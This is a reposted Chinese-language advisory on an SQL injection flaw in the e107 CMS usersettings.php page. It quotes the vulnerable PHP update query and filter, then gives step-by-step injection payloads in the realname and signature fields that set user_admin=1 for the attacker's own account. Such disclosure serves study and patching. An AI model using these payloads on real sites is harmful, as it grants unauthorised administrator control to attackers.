分享

e107内容管理系统SQL注入漏洞

 Isolated 2010-05-23
发布日期:2010-05.21 
发布作者:未知
影响版本:未知
官方地址: http:// 
漏洞描述: e107内容管理系统usersettings.php页面存在SQL注入漏洞
 
usersettings.php页面代码
if ($ret == '')
{
$loginname = strip_tags($_POST['loginname']);
if (!$loginname)
{
$loginname = $udata['user_loginname'];
}
else
{
if(!check_class($pref['displayname_class'], $udata['user_classlist'], $peer))
{
$new_username = "user_name = '{$loginname}', ";
$username = $loginname;
}
}
...
$_POST['signature'] = $tp->toDB($_POST['signature']);
$_POST['realname'] = $tp->toDB($_POST['realname']);
...
// We can update the basic user record now
$sql->db_Update("user", "{$new_username} {$pwreset} {$sesschange} user_email='".$tp -> toDB($_POST['email'])."', user_signature='".$_POST['signature']."', user_image='".$tp -> toDB($_POST['image'])."', user_timezone='".$tp -> toDB($_POST['timezone'])."', user_hideemail='".intval($tp -> toDB($_POST['hideemail']))."', user_login='".$_POST['realname']."' {$new_customtitle}, user_xup='".$tp -> toDB($_POST['user_xup'])."' WHERE user_id='".intval($inp)."' ");
上述代码没有执行正确地数据库转义便将POST变量loginname注入到了SQL查询中。但在之前几行的过滤器可以防范一些字符:
// Login Name checks
if (isset($_POST['loginname']))
{ // Only check if its been edited
$temp_name = trim(preg_replace('/ |\#|\=|\$/', "", strip_tags($_POST['loginname'])));
if ($temp_name != $_POST['loginname'])
{
$error .= LAN_USET_13."\\n";
}
// Check if login name exceeds maximum allowed length
if (strlen($temp_name) > varset($pref['loginname_maxlength'],30))
{
$error .= LAN_USET_14."\\n";
}
$_POST['loginname'] = $temp_name;
}
 
这个过滤器禁用“#”、“=”等字符并检查loginname长度不能超过所允许的最大值,但还不足以防范攻击,因为只需“/*”字符就可以终止字符串上下文,并打开可在签名中关闭的标注。

测试方法:

1. 访问有漏洞的e107
2. 创建名为xpltest的新用户
3. 以xpltest身份登录
4. 进入到用户设置
5. 在页面的HTML源码中从隐藏的_uid字段找到用户ID,假设为444。
6. 将xpltest'/*输入到realname字段
7. 将*/,user_admin=1 where user_id=444 -- x输入到签名字段(用自己的用户ID替换444)
8. 启动tamperdata开始激活篡改
9. 提交用户设置并将realname变量更改为loginname
10. 现在xpltest用户为管理员

本文转自 ☆★ 包罗万象网 ★☆ - http://www. 转载请注明出处,侵权必究!
原文链接:http://www./a/net-offense/loophole/2010/0522/883.html

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约